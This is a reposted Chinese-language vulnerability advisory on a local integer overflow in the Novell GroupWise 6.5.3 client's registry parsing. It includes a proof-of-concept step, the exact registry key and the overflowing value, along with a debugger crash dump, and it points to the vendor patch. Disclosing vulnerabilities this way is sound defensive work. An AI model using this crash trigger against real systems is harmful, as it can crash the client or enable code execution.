[转载]Novell GroupWise客户端本地整数溢出漏洞

信息来源：绿盟科技

受影响系统：
Novell Groupwise 6.5.3
不受影响系统：
Novell Groupwise 6.5 SP5
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 14952

Novell GroupWise是一款跨平台协作软件。

GroupWise注册表解析代码中存在整数溢出漏洞，攻击者可以通过修改某些键值创建整数溢出，导致崩溃或执行任意代码。

起因是应用程序没能安全的解析windows注册表中保存的最后认证的端口数。

<*来源：Francisco Amato （famato@infobyte.com.ar）

链接：http://marc.theaimsgroup.com/?l= ... 84386426802&w=2
http://support.novell.com/techce ... ternalId=10098814ht
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

将HKEY_CURRENT_USER\Software\Novell\GroupWise\Login Parameters\TCP/IP Port的默认注册表项修改为：

11111111111111111111111111111111

然后打开客户端，客户端取得端口信息，发生整数溢出。

EAX C71C71C7
ECX 01F6ADC0 ASCII "10.1.1.1"
EDX 01F6ADC0 ASCII "10.1.1.1"
EBX 00000000
ESP 0012E9DC
EBP 0012E9EC
ESI 00000000
EDI 00000000
EIP 52080AB3 gwenv1.52080AB3
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 0038 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010292 (NO,NB,NE,A,S,PO,L,LE)
ST0 empty -NAN FFFF FFFCFEFC FFFCFEFC
ST1 empty -??? FFFF 00000000 00000000
ST2 empty -??? FFFF 00FE00FB 00FD00FB
ST3 empty -??? FFFF 00FE00FB 00FD00FB
ST4 empty -NAN FFFF FFFCFEFC FFFCFEFC
ST5 empty -??? FFFF 00FF00FC 00FE00FC
ST6 empty -??? FFFF 00000000 00000000
ST7 empty 256.00000000000000000
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

Asm代码行：
52080AB3 66:8B00 MOV AX,WORD PTR DS:[EAX]

建议：
--------------------------------------------------------------------------------
厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.novell.com/cgi-bi ... id.cgi?/2972191.htm